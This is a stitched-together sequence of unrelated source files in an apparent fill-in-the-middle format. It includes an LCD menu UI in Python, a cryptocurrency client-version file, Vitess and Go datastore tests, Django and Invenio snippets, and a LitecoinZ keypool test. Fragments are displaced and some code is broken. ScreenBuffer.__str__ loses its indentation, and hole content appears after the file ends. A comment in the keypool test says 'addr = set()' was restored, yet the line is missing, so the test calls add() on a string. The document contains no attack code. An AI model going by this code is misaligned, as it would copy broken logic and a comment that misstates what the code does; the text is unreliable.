    frames added with AddFrame().
    """

    def __init__(self, ui):
        Frame.__init__(self, ui)
        self._inner_frames = deque()    # rotation order; index 0 is on screen
        self._display_time = {}         # frame -> seconds it stays visible
        self._last_rotate = None        # time.time() of the last rotation
    def AddWidget(self, widget_obj, name, row=0, col=0, span=None):
        # Direct widget management is disabled; use child frames instead.
        raise NotImplementedError
    def GetWidget(self, name):
        raise NotImplementedError
    def RemoveWidget(self, name):
        raise NotImplementedError
    def frames(self):
        # The live deque of child frames (not a copy).
        return self._inner_frames
    def AddFrame(self, frame, display_time):
        # display_time: seconds this frame stays visible per rotation.
        self._inner_frames.append(frame)
        self._display_time[frame] = display_time
    def RemoveFrame(self, frame):
        self._inner_frames.remove(frame)
        del self._display_time[frame]
    def Paint(self):
        # With no children there is nothing to paint.
        if not self._inner_frames:
            return ''
        now = time.time()
        if self._last_rotate:
            active_time = now - self._last_rotate
        else:
            # First paint: start the clock for the current frame.
            self._last_rotate = now
            active_time = 0
        curr = self._inner_frames[0]
        # Rotate only when there is more than one frame and the current one
        # has exceeded its display time; the pre-rotation frame is still
        # painted this cycle.
        if len(self._inner_frames) > 1:
            max_time = self._display_time[curr]
            if active_time > max_time:
                self._inner_frames.rotate(-1)
                self._last_rotate = now
        return curr.Paint()
class MenuFrame(Frame):
    """Scrollable menu frame: a title row on row 0, a cursor, and up/down
    scroll indicators when more items exist than fit in the window."""

    def onInitialize(self):
        self._show_back = False              # whether the title shows a back symbol
        self._items = []                     # list of (key, value) menu entries
        self._cursor_pos = 0                 # absolute index into self._items
        self._window_pos = 0                 # index of the first visible item
        self._window_size = self.rows() - 1  # row 0 is reserved for the title
        self._title_widget = self.BuildWidget(widget.LineWidget, row=0, col=0)
        self.setTitle('')
        self._item_widgets = []
        for i in xrange(self._window_size):
            w = self.BuildWidget(widget.LineWidget, row=i+1, col=0)
            self._item_widgets.append(w)
        self._rebuildMenu()

    def showBack(self, enable):
        """Enable/disable the back indicator and redraw."""
        self._show_back = enable
        self._rebuildMenu()

    def addItem(self, key, value):
        """Append a (key, value) entry; `value` is the displayed text."""
        self._items.append((key, value))
        self._rebuildMenu()

    def scrollUp(self):
        """Move the cursor up one item, if not already at the top."""
        if self._cursor_pos == 0:
            return
        self._cursor_pos -= 1
        self._updateWindowPos()
        self._rebuildMenu()

    def scrollDown(self):
        """Move the cursor down one item, if not already at the bottom."""
        if (self._cursor_pos + 1) == len(self._items):
            return
        self._cursor_pos += 1
        self._updateWindowPos()
        self._rebuildMenu()

    def _rebuildMenu(self):
        """Redraw the visible window of items, the cursor, and scroll marks."""
        items = self._items[self._window_pos:self._window_pos+self._window_size]
        # (Removed an unused `num_blank` local; the blank rows are covered by
        # the second loop below.)
        symbol_up = self._ui.GetSymbol(common.SYMBOL.MENU_LIST_UP)
        symbol_down = self._ui.GetSymbol(common.SYMBOL.MENU_LIST_DOWN)
        symbol_cursor = self._ui.GetSymbol(common.SYMBOL.MENU_CURSOR)
        for item_pos in xrange(len(items)):
            _item_key, item_value = items[item_pos]
            w = self._item_widgets[item_pos]
            w.set_contents(item_value)
        for blank_pos in xrange(len(items), self._window_size):
            # Clear widgets past the last item.
            w = self._item_widgets[blank_pos]
            w.set_contents('')
        # Draw the cursor on the row that corresponds to the cursor position
        # within the current window.
        for i in xrange(len(self._item_widgets)):
            w = self._item_widgets[i]
            if i == (self._cursor_pos % self._window_size):
                w.set_prefix(symbol_cursor + '|')
            else:
                w.set_prefix(' |')
            w.set_postfix('| ')
        # Overwrite the corner postfixes with scroll indicators when there
        # are items above/below the visible window.
        if self._window_pos > 0:
            self._item_widgets[0].set_postfix('|' + symbol_up)
        if (self._window_pos + self._window_size) < len(self._items):
            self._item_widgets[-1].set_postfix('|' + symbol_down)

    def _updateWindowPos(self):
        # Snap the window to the page containing the cursor.
        self._window_pos = self._cursor_pos - (self._cursor_pos % self._window_size)

    def setTitle(self, title):
        """Set the title row, underscore-padded to the full frame width."""
        prefix = ''
        symbol_back = self._ui.GetSymbol(common.SYMBOL.FRAME_BACK)
        if self._show_back:
            postfix = '_' + symbol_back + '_'
        else:
            postfix = ''
        # NOTE(review): `avail` does not subtract the postfix length, so a
        # back indicator may push the padded title past the frame width —
        # confirm intended behavior against the widget clipping logic.
        avail = self.cols()
        title_str = title
        if len(title_str) < avail:
            title_str += '_' * (avail - len(title_str))
        self._title_widget.set_contents(title_str)
        self._title_widget.set_prefix(prefix)
        self._title_widget.set_postfix(postfix)

    def onLoad(self, lcd):
        pass
class ScreenBuffer:
    """A rows x cols character screen buffer backed by a flat
    array.array('c') (Python 2 byte-character array), initialized to spaces."""

    def __init__(self, rows, cols):
        self._rows = rows
        self._cols = cols
        self._array = array.array('c', [' '] * (rows * cols))

    def __eq__(self, other):
        # Fix: compare against ScreenBuffer. The previous code referenced
        # the undefined name `ScreenMatrix`, so any equality comparison
        # raised NameError instead of returning a result.
        if isinstance(other, ScreenBuffer):
            return self._array == other._array
        return False

    def array(self):
        """Return the underlying flat character array."""
        return self._array

    def _AllocNewArray(self):
        # Fresh all-spaces backing array of the full buffer size.
        return array.array('c', [' '] * (self._rows * self._cols))

    def _GetOffset(self, row, col):
        """Map (row, col) to an index into the flat array (row-major)."""
        return row*self._cols + col

    def Clear(self):
        """Reset every cell to a space."""
        self._array = self._AllocNewArray()

    def Write(self, data, row, col, span):
        """Replace up to `span` characters at (row, col) with `data`.

        NOTE(review): the write is not clamped at the row boundary; a long
        enough write continues into the following row. Confirm callers
        always pass spans that fit.
        """
        assert 0 <= row < self._rows
        assert 0 <= col < self._cols
        start = self._GetOffset(row, col)
        datalen = min(len(data), span)
        end = start + datalen
        self._array[start:end] = data[:datalen]
def __str__(self):
return self._array.tostring()<|fim▁end|> | self._widgets = {}
self._position = {}
self._span = {} |
<|file_name|>clientversion.cpp<|end_file_name|><|fim▁begin|>// Copyright (c) 2012-2014 The Moneta developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "clientversion.h"
#include "tinyformat.h"
#include <string>
/**
* Name of client reported in the 'version' message. Report the same name
* for both monetad and moneta-core, to make it harder for attackers to
* target servers or GUI users specifically.
*/
const std::string CLIENT_NAME("Tellurion");
/**
* Client version number
*/
#define CLIENT_VERSION_SUFFIX ""
/**
* The following part of the code determines the CLIENT_BUILD variable.
* Several mechanisms are used for this:
* * first, if HAVE_BUILD_INFO is defined, include build.h, a file that is
* generated by the build environment, possibly containing the output
* of git-describe in a macro called BUILD_DESC
* * secondly, if this is an exported version of the code, GIT_ARCHIVE will
* be defined (automatically using the export-subst git attribute), and
* GIT_COMMIT will contain the commit id.
* * then, three options exist for determining CLIENT_BUILD:
* * if BUILD_DESC is defined, use that literally (output of git-describe)
* * if not, but GIT_COMMIT is defined, use v[maj].[min].[rev].[build]-g[commit]
* * otherwise, use v[maj].[min].[rev].[build]-unk
* finally CLIENT_VERSION_SUFFIX is added
*/
//! First, include build.h if requested
#ifdef HAVE_BUILD_INFO
#include "build.h"
#endif
//! git will put "#define GIT_ARCHIVE 1" on the next line inside archives. $Format:%n#define GIT_ARCHIVE 1$
#ifdef GIT_ARCHIVE
#define GIT_COMMIT_ID "$Format:%h$"
#define GIT_COMMIT_DATE "$Format:%cD$"
#endif
#define BUILD_DESC_WITH_SUFFIX(maj, min, rev, build, suffix) \
"v" DO_STRINGIZE(maj) "." DO_STRINGIZE(min) "." DO_STRINGIZE(rev) "." DO_STRINGIZE(build) "-" DO_STRINGIZE(suffix)
#define BUILD_DESC_FROM_COMMIT(maj, min, rev, build, commit) \
"v" DO_STRINGIZE(maj) "." DO_STRINGIZE(min) "." DO_STRINGIZE(rev) "." DO_STRINGIZE(build) "-g" commit
#define BUILD_DESC_FROM_UNKNOWN(maj, min, rev, build) \
"v" DO_STRINGIZE(maj) "." DO_STRINGIZE(min) "." DO_STRINGIZE(rev) "." DO_STRINGIZE(build) "-unk"
#ifndef BUILD_DESC
#ifdef BUILD_SUFFIX
#define BUILD_DESC BUILD_DESC_WITH_SUFFIX(CLIENT_VERSION_MAJOR, CLIENT_VERSION_MINOR, CLIENT_VERSION_REVISION, CLIENT_VERSION_BUILD, BUILD_SUFFIX)
#elif defined(GIT_COMMIT_ID)
#define BUILD_DESC BUILD_DESC_FROM_COMMIT(CLIENT_VERSION_MAJOR, CLIENT_VERSION_MINOR, CLIENT_VERSION_REVISION, CLIENT_VERSION_BUILD, GIT_COMMIT_ID)<|fim▁hole|>
#ifndef BUILD_DATE
#ifdef GIT_COMMIT_DATE
#define BUILD_DATE GIT_COMMIT_DATE
#else
#define BUILD_DATE __DATE__ ", " __TIME__
#endif
#endif
const std::string CLIENT_BUILD(BUILD_DESC CLIENT_VERSION_SUFFIX);
const std::string CLIENT_DATE(BUILD_DATE);
/**
 * Render an integer version encoded as major*1000000 + minor*10000 +
 * revision*100 + build into a dotted string. The trailing build
 * component is omitted when it is zero.
 */
static std::string FormatVersion(int nVersion)
{
    if (nVersion % 100 == 0)
        return strprintf("%d.%d.%d", nVersion / 1000000, (nVersion / 10000) % 100, (nVersion / 100) % 100);
    else
        return strprintf("%d.%d.%d.%d", nVersion / 1000000, (nVersion / 10000) % 100, (nVersion / 100) % 100, nVersion % 100);
}
/** Return the full build description (BUILD_DESC plus the version suffix). */
std::string FormatFullVersion()
{
    return CLIENT_BUILD;
}
/**
* Format the subversion field according to BIP 14 spec (https://github.com/moneta/bips/blob/master/bip-0014.mediawiki)
*/
std::string FormatSubVersion(const std::string& name, int nClientVersion, const std::vector<std::string>& comments)
{
    // Produces "/Name:x.y.z(comment1; comment2)/", the BIP 14 user-agent
    // shape; the parenthesized comment list is omitted when empty.
    std::ostringstream ss;
    ss << "/" << name << ":" << FormatVersion(nClientVersion);
    if (!comments.empty()) {
        ss << "(";
        for (size_t i = 0; i < comments.size(); ++i) {
            if (i != 0)
                ss << "; ";
            ss << comments[i];
        }
        ss << ")";
    }
    ss << "/";
    return ss.str();
}
#define BUILD_DESC BUILD_DESC_FROM_UNKNOWN(CLIENT_VERSION_MAJOR, CLIENT_VERSION_MINOR, CLIENT_VERSION_REVISION, CLIENT_VERSION_BUILD)
#endif
#endif |
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>##########################################################################
#
# Copyright (c) 2015, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following<|fim▁hole|># the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
__import__( "Gaffer" )
from _GafferDispatch import *
from LocalDispatcher import LocalDispatcher
from SystemCommand import SystemCommand
from TaskList import TaskList
from TaskContextProcessor import TaskContextProcessor
from Wedge import Wedge
from TaskContextVariables import TaskContextVariables
from TaskSwitch import TaskSwitch
from PythonCommand import PythonCommand
__import__( "IECore" ).loadConfig( "GAFFER_STARTUP_PATHS", {}, subdirectory = "GafferDispatch" )<|fim▁end|> | # disclaimer in the documentation and/or other materials provided with |
<|file_name|>apply_schema_test.go<|end_file_name|><|fim▁begin|>/*
Copyright 2017 Google Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package testlib
import (
"strings"
"testing"
"golang.org/x/net/context"<|fim▁hole|> "vitess.io/vitess/go/mysql/fakesqldb"
"vitess.io/vitess/go/sqltypes"
"vitess.io/vitess/go/vt/logutil"
"vitess.io/vitess/go/vt/mysqlctl/tmutils"
"vitess.io/vitess/go/vt/topo/memorytopo"
"vitess.io/vitess/go/vt/vttablet/tmclient"
"vitess.io/vitess/go/vt/wrangler"
tabletmanagerdatapb "vitess.io/vitess/go/vt/proto/tabletmanagerdata"
topodatapb "vitess.io/vitess/go/vt/proto/topodata"
)
// TestApplySchema_AllowLongUnavailability is an integration test for the
// -allow_long_unavailability flag of vtctl ApplySchema.
// Only if the flag is specified, potentially long running schema changes are
// allowed.
func TestApplySchema_AllowLongUnavailability(t *testing.T) {
	// --- Test fixture: in-memory topo, fake MySQL, one wrangler/vtctl pipe ---
	cell := "cell1"
	db := fakesqldb.New(t)
	defer db.Close()
	ts := memorytopo.NewServer(cell)
	wr := wrangler.New(logutil.NewConsoleLogger(), ts, tmclient.NewTabletManagerClient())
	vp := NewVtctlPipe(t, ts)
	defer vp.Close()
	if err := ts.CreateKeyspace(context.Background(), "ks", &topodatapb.Keyspace{
		ShardingColumnName: "keyspace_id",
		ShardingColumnType: topodatapb.KeyspaceIdType_UINT64,
	}); err != nil {
		t.Fatalf("CreateKeyspace failed: %v", err)
	}
	// RowCount of 3M makes the preflight classify this as a "big" schema
	// change, which is what triggers the -allow_long_unavailability gate.
	beforeSchema := &tabletmanagerdatapb.SchemaDefinition{
		DatabaseSchema: "CREATE DATABASE `{{.DatabaseName}}` /*!40100 DEFAULT CHARACTER SET utf8 */",
		TableDefinitions: []*tabletmanagerdatapb.TableDefinition{
			{
				Name:     "table1",
				Schema:   "CREATE TABLE `table1` (\n `id` bigint(20) NOT NULL AUTO_INCREMENT,\n `msg` varchar(64) DEFAULT NULL,\n `keyspace_id` bigint(20) unsigned NOT NULL,\n PRIMARY KEY (`id`),\n KEY `by_msg` (`msg`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8",
				Type:     tmutils.TableBaseTable,
				RowCount: 3000000,
			},
		},
	}
	// NOTE(review): the added column below is named `id` (a duplicate) while
	// the ALTER statement adds `new_id` — looks like a fixture typo; confirm
	// the fake daemon's preflight result does not depend on the column name.
	afterSchema := &tabletmanagerdatapb.SchemaDefinition{
		DatabaseSchema: "CREATE DATABASE `{{.DatabaseName}}` /*!40100 DEFAULT CHARACTER SET utf8 */",
		TableDefinitions: []*tabletmanagerdatapb.TableDefinition{
			{
				Name:     "table1",
				Schema:   "CREATE TABLE `table1` (\n `id` bigint(20) NOT NULL AUTO_INCREMENT,\n `msg` varchar(64) DEFAULT NULL,\n `keyspace_id` bigint(20) unsigned NOT NULL,\n `id` bigint(20),\n PRIMARY KEY (`id`),\n KEY `by_msg` (`msg`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8",
				Type:     tmutils.TableBaseTable,
				RowCount: 3000000,
			},
		},
	}
	preflightSchemaChanges := []*tabletmanagerdatapb.SchemaChangeResult{
		{
			BeforeSchema: beforeSchema,
			AfterSchema:  afterSchema,
		},
	}
	// Two master tablets, one per shard, both backed by the same fake db.
	tShard1 := NewFakeTablet(t, wr, cell, 0,
		topodatapb.TabletType_MASTER, db, TabletKeyspaceShard(t, "ks", "-80"))
	tShard2 := NewFakeTablet(t, wr, cell, 1,
		topodatapb.TabletType_MASTER, db, TabletKeyspaceShard(t, "ks", "80-"))
	for _, ft := range []*FakeTablet{tShard1, tShard2} {
		ft.StartActionLoop(t, wr)
		defer ft.StopActionLoop(t)
		ft.FakeMysqlDaemon.Schema = beforeSchema
		ft.FakeMysqlDaemon.PreflightSchemaChangeResult = preflightSchemaChanges
	}
	changeToDb := "USE vt_ks"
	addColumn := "ALTER TABLE table1 ADD COLUMN new_id bigint(20)"
	db.AddQuery(changeToDb, &sqltypes.Result{})
	db.AddQuery(addColumn, &sqltypes.Result{})
	// First ApplySchema fails because the table is very big and -allow_long_unavailability is missing.
	if err := vp.Run([]string{"ApplySchema", "-sql", addColumn, "ks"}); err == nil {
		t.Fatal("ApplySchema should have failed but did not.")
	} else if !strings.Contains(err.Error(), "big schema change detected") {
		t.Fatalf("ApplySchema failed with wrong error. got: %v", err)
	}
	// Second ApplySchema succeeds because -allow_long_unavailability is set.
	if err := vp.Run([]string{"ApplySchema", "-allow_long_unavailability", "-sql", addColumn, "ks"}); err != nil {
		t.Fatalf("ApplySchema failed: %v", err)
	}
	// The change must have been applied once per shard (2 shards).
	if count := db.GetQueryCalledNum(changeToDb); count != 2 {
		t.Fatalf("ApplySchema: unexpected call count. Query: %v got: %v want: %v", changeToDb, count, 2)
	}
	if count := db.GetQueryCalledNum(addColumn); count != 2 {
		t.Fatalf("ApplySchema: unexpected call count. Query: %v got: %v want: %v", addColumn, count, 2)
	}
}
<|file_name|>Print_Success_SRV.py<|end_file_name|><|fim▁begin|># This file is part of Invenio.
# Copyright (C) 2004, 2005, 2006, 2007, 2008, 2010, 2011, 2017 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
__revision__ = "$Id$"
from invenio.config import CFG_SITE_URL, CFG_SITE_RECORD
from invenio.websubmit_functions.Shared_Functions import ParamFromFile
## Description: function Print_Success_SRV<|fim▁hole|>
def Print_Success_SRV(parameters, curdir, form, user_info=None):
    """
    This function simply displays a text on the screen, telling the
    user the revision went fine. To be used in the Submit New File
    (SRV) action.

    Relies on the WebSubmit-provided global `rn` (report number) and reads
    the record id from the 'SN' file in `curdir`.
    """
    global rn
    sysno = ParamFromFile("%s/%s" % (curdir, 'SN')).strip()
    # (Removed a dead initial assignment to `t`; both branches below
    # unconditionally overwrite it.)
    if sysno:
        # If we know the URL of the document, we display it for user's
        # convenience (RQF0800417)
        url = '%s/%s/%s' % (CFG_SITE_URL, CFG_SITE_RECORD, sysno)
        t = "<br /><br /><b>Document %s (<b><a href='%s'>%s</a></b>) was successfully revised.</b>" % (rn, url, url)
    else:
        t = "<br /><br /><b>Document %s was successfully revised.</b>" % rn
    return t
## revised files have been correctly received
## Author: T.Baron
## PARAMETERS: - |
<|file_name|>fields.py<|end_file_name|><|fim▁begin|>from django.db import models
# Django doesn't support big auto fields out of the box, see
# https://code.djangoproject.com/ticket/14286.
# This is a stripped down version of the BoundedBigAutoField from Sentry.
class BigAutoField(models.AutoField):
    """AutoField backed by a 64-bit integer column.

    Only MySQL and PostgreSQL engines are supported; anything else raises
    NotImplementedError.
    """
    description = "Big Integer"

    def db_type(self, connection):
        engine = connection.settings_dict['ENGINE']
        if 'mysql' in engine:
            return "bigint AUTO_INCREMENT"
        elif 'postgres' in engine:
            return "bigserial"
        else:
            # Fix: `raise NotImplemented` raised a TypeError at runtime
            # (NotImplemented is a sentinel value, not an exception class).
            raise NotImplementedError(
                "BigAutoField is not supported on engine %r" % engine)

    def get_related_db_type(self, connection):
        # Column type that ForeignKeys pointing at this field should use
        # (see FlexibleForeignKey.db_type).
        return models.BigIntegerField().db_type(connection)

    def get_internal_type(self):
        return "BigIntegerField"
class FlexibleForeignKey(models.ForeignKey):
    """ForeignKey whose column type defers to the target field's
    get_related_db_type() when available, so FKs to a BigAutoField
    correctly become bigint columns."""

    def db_type(self, connection):
        # This is required to support BigAutoField
        rel_field = self.related_field
        if hasattr(rel_field, 'get_related_db_type'):
            return rel_field.get_related_db_type(connection)
        return super(FlexibleForeignKey, self).db_type(connection)
<|file_name|>dmx_color_variable_controller_test.go<|end_file_name|><|fim▁begin|>package datastore
import (
"testing"
"github.com/StageAutoControl/controller/pkg/api"
"github.com/StageAutoControl/controller/pkg/cntl"
internalTesting "github.com/StageAutoControl/controller/pkg/internal/testing"
"github.com/jinzhu/copier"
)
// TestDMXColorVariableController_Create_WithID verifies that Create keeps a
// caller-supplied entity ID instead of generating a new one.
func TestDMXColorVariableController_Create_WithID(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	entity := ds.DMXColorVariables[key]
	createReply := &cntl.DMXColorVariable{}
	if err := controller.Create(req, entity, createReply); err != nil {
		t.Errorf("failed to call apiController: %v", err)
	}
	if createReply.ID != key {
		t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
	}
}
// TestDMXColorVariableController_Create_WithoutID verifies that Create
// assigns an ID when the submitted entity has none. The fixture is copied
// before clearing the ID so the shared test data is not mutated.
func TestDMXColorVariableController_Create_WithoutID(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	entity := ds.DMXColorVariables[key]
	createEntity := &cntl.DMXColorVariable{}
	if err := copier.Copy(createEntity, entity); err != nil {
		t.Fatal(err)
	}
	createEntity.ID = ""
	createReply := &cntl.DMXColorVariable{}
	if err := controller.Create(req, entity, createReply); err != nil {
		t.Errorf("failed to call apiController: %v", err)
	}
	if createReply.ID != key {
		t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
	}
}
// TestDMXColorVariableController_Get_NotExisting verifies that Get returns
// api.ErrNotExists for an unknown ID.
func TestDMXColorVariableController_Get_NotExisting(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	reply := &cntl.DMXColorVariable{}
	idReq := &api.IDBody{ID: key}
	if err := controller.Get(req, idReq, reply); err != api.ErrNotExists {
		t.Errorf("expected to get api.ErrNotExists, but got %v", err)
	}
}
func TestDMXColorVariableController_Get_Existing(t *testing.T) {
defer internalTesting.Cleanup(t, path)
controller := NewDMXColorVariableController(logger, store)
key := "4b848ea8-5094-4509-a067-09a0e568220d"
entity := ds.DMXColorVariables[key]
createReply := &cntl.DMXColorVariable{}
if err := controller.Create(req, entity, createReply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if createReply.ID != key {
t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
}
reply := &cntl.DMXColorVariable{}
idReq := &api.IDBody{ID: key}
t.Log("idReq has ID:", idReq.ID)
if err := controller.Get(req, idReq, reply); err != nil {
t.Errorf("failed to call apiController: %v", err)
}
if reply.ID != key {
t.Errorf("Expected reply to have id %s, but has %s", key, reply.ID)<|fim▁hole|> }
}
// TestDMXColorVariableController_Update_NotExisting verifies that Update
// returns api.ErrNotExists when the entity was never created.
func TestDMXColorVariableController_Update_NotExisting(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	entity := ds.DMXColorVariables[key]
	reply := &cntl.DMXColorVariable{}
	if err := controller.Update(req, entity, reply); err != api.ErrNotExists {
		t.Errorf("expected to get api.ErrNotExists, but got %v", err)
	}
}
// TestDMXColorVariableController_Update_Existing verifies that Update
// succeeds (and preserves the ID) for an entity that was created first.
func TestDMXColorVariableController_Update_Existing(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	entity := ds.DMXColorVariables[key]
	createReply := &cntl.DMXColorVariable{}
	if err := controller.Create(req, entity, createReply); err != nil {
		t.Errorf("failed to call apiController: %v", err)
	}
	if createReply.ID != key {
		t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
	}
	reply := &cntl.DMXColorVariable{}
	if err := controller.Update(req, entity, reply); err != nil {
		t.Errorf("expected to get no error, but got %v", err)
	}
	if reply.ID != key {
		t.Errorf("Expected reply to have id %s, but has %s", key, reply.ID)
	}
}
// TestDMXColorVariableController_Delete_NotExisting verifies that Delete
// returns api.ErrNotExists for an unknown ID.
func TestDMXColorVariableController_Delete_NotExisting(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	reply := &api.SuccessResponse{}
	idReq := &api.IDBody{ID: key}
	if err := controller.Delete(req, idReq, reply); err != api.ErrNotExists {
		t.Errorf("expected to get api.ErrNotExists, but got %v", err)
	}
}
// TestDMXColorVariableController_Delete_Existing verifies that Delete
// succeeds and reports success for an entity that was created first.
func TestDMXColorVariableController_Delete_Existing(t *testing.T) {
	defer internalTesting.Cleanup(t, path)
	controller := NewDMXColorVariableController(logger, store)
	key := "4b848ea8-5094-4509-a067-09a0e568220d"
	entity := ds.DMXColorVariables[key]
	createReply := &cntl.DMXColorVariable{}
	if err := controller.Create(req, entity, createReply); err != nil {
		t.Errorf("failed to call apiController: %v", err)
	}
	if createReply.ID != key {
		t.Errorf("Expected createReply to have id %s, but has %s", key, createReply.ID)
	}
	reply := &api.SuccessResponse{}
	idReq := &api.IDBody{ID: key}
	if err := controller.Delete(req, idReq, reply); err != nil {
		t.Errorf("expected to get no error, but got %v", err)
	}
	if !reply.Success {
		t.Error("Expected to get result true, but got false")
	}
}
<|file_name|>keypool.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python2
# Copyright (c) 2014 The Bitcoin Core developers
# Copyright (c) 2017-2018 The LitecoinZ developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Exercise the wallet keypool, and interaction with wallet encryption/locking
# Add python-bitcoinrpc to module search path:
from test_framework.authproxy import JSONRPCException
from test_framework.util import check_json_precision, initialize_chain, \
start_nodes, start_node, stop_nodes, wait_litecoinzds, litecoinzd_processes
import os
import sys
import shutil
import tempfile
import traceback
def check_array_result(object_array, to_match, expected):
    """
    Pass in array of JSON objects, a dictionary with key/value pairs
    to match against, and another dictionary with expected key/value
    pairs.
    """
    matches = 0
    for obj in object_array:
        # A list (not generator) so every to_match key is looked up,
        # preserving the original KeyError behavior for missing keys.
        if any([obj[k] != v for k, v in to_match.items()]):
            continue
        for k, v in expected.items():
            if obj[k] != v:
                raise AssertionError("%s : expected %s=%s" % (str(obj), str(k), str(v)))
        matches += 1
    if matches == 0:
        raise AssertionError("No objects matched %s" % (str(to_match)))
def run_test(nodes, tmpdir):
    """Exercise keypool exhaustion and refill on an encrypted wallet (node 0)."""
    # Encrypt wallet and wait for the daemon process to terminate.
    nodes[0].encryptwallet('test')
    litecoinzd_processes[0].wait()
    # Restart node 0 with the now-encrypted wallet.
    nodes[0] = start_node(0, tmpdir)
    # One pre-generated key remains; a second request must fail because the
    # locked wallet cannot top the keypool up.
    addr = nodes[0].getnewaddress()
    try:
        addr = nodes[0].getnewaddress()
        raise AssertionError('Keypool should be exhausted after one address')
    except JSONRPCException as e:
        assert(e.error['code']==-12)  # keypool-ran-out RPC error
    # Unlock, put three new keys in the keypool, then re-lock.
    nodes[0].walletpassphrase('test', 12000)
    nodes[0].keypoolrefill(3)
    nodes[0].walletlock()
    # Drain the keys, collecting them in a set to prove they are distinct.
    # (Fix: `addr = set()` had been dropped, so addr.add() was called on the
    # string returned by getnewaddress above.)
    addr = set()
    addr.add(nodes[0].getrawchangeaddress())
    addr.add(nodes[0].getrawchangeaddress())
    addr.add(nodes[0].getrawchangeaddress())
    addr.add(nodes[0].getrawchangeaddress())
    # assert that four unique addresses were returned
    assert(len(addr) == 4)
    # the next one should fail
    try:
        addr = nodes[0].getrawchangeaddress()
        raise AssertionError('Keypool should be exhausted after three addresses')
    except JSONRPCException as e:
        assert(e.error['code']==-12)
def main():
    """Parse CLI options, initialize a one-node test chain, run the keypool
    test, then clean up and exit 0 on success / 1 on any failure."""
    import optparse
    parser = optparse.OptionParser(usage="%prog [options]")
    parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
                      help="Leave litecoinzds and test.* datadir on exit or error")
    parser.add_option("--srcdir", dest="srcdir", default="../../src",
                      help="Source directory containing litecoinzd/litecoinz-cli (default: %default%)")
    parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
                      help="Root directory for datadirs")
    (options, args) = parser.parse_args()
    # Make the daemon binaries under srcdir take precedence on PATH.
    os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
    check_json_precision()
    success = False
    nodes = []
    try:
        print("Initializing test directory "+options.tmpdir)
        if not os.path.isdir(options.tmpdir):
            os.makedirs(options.tmpdir)
        initialize_chain(options.tmpdir)
        # Wallet encryption requires the experimental feature flags.
        nodes = start_nodes(1, options.tmpdir, extra_args=[['-experimentalfeatures', '-developerencryptwallet']])
        run_test(nodes, options.tmpdir)
        success = True
